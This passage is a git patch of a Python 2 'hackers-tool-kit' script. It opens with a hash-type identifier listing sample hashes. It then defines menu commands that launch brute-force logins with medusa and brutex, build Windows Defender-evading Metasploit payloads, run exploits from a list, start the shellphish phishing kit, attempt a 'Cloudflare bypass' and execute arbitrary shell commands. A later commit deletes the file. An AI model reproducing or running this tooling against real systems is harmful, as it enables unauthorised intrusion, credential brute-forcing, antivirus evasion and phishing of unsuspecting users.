jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + found = True +mainbanner() +main() From 8efba2bd67f8c94dd72c00d6e4fe8d830d3b5d31 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 20 Mar 2019 02:14:41 +0100 Subject: [PATCH 045/214] Delete htk.py --- htk.py | 2018 -------------------------------------------------------- 1 file changed, 2018 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 87289da..0000000 --- a/htk.py +++ /dev/null @@ -1,2018 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print 